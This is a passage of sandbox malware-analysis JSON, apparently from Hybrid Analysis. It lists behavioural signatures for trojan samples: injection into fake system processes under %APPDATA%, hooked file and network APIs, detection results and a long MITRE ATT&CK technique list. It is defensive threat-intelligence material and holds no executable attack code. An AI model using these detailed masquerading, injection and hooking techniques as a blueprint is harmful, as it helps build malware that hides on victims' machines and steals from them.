\"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 340)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 340)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 340)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 340)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" allocated memory in \"C:\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\"\n \"4k51k4.exe\" allocated memory in \"%WINDIR%\\4k51k4.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002108)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005328)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003136)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003236)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003752)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003220)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005756)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002164)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005308)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00000944)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003276)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005584)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00000656)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002040)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005508)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003156)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00006032)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005928)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004188)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004288)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004348)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00006064)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005936)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005804)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004580)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005548)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00006016)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001208)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004116)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002432)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004780)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004144)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004440)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003868)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004020)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001556)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004540)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004492)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004740)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003740)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002280)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"4k51k4.exe\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c
https://hybrid-analysis.com/sample/234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c
Hybrid Analysis - Killers
{"size": 471040, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c", "sha256": "234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c", "av_detect": 71, "vx_family": "Trojan.Generic", "threat_score": 75, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 154, "processes": [{"uid": "00000000-00005280", "name": "234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe", "normalized_path": "C:\\234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe", "sha256": "234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c", "av_label": "Trojan.Generic", "av_matched": 9, "av_total": 22}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 5, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 5, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 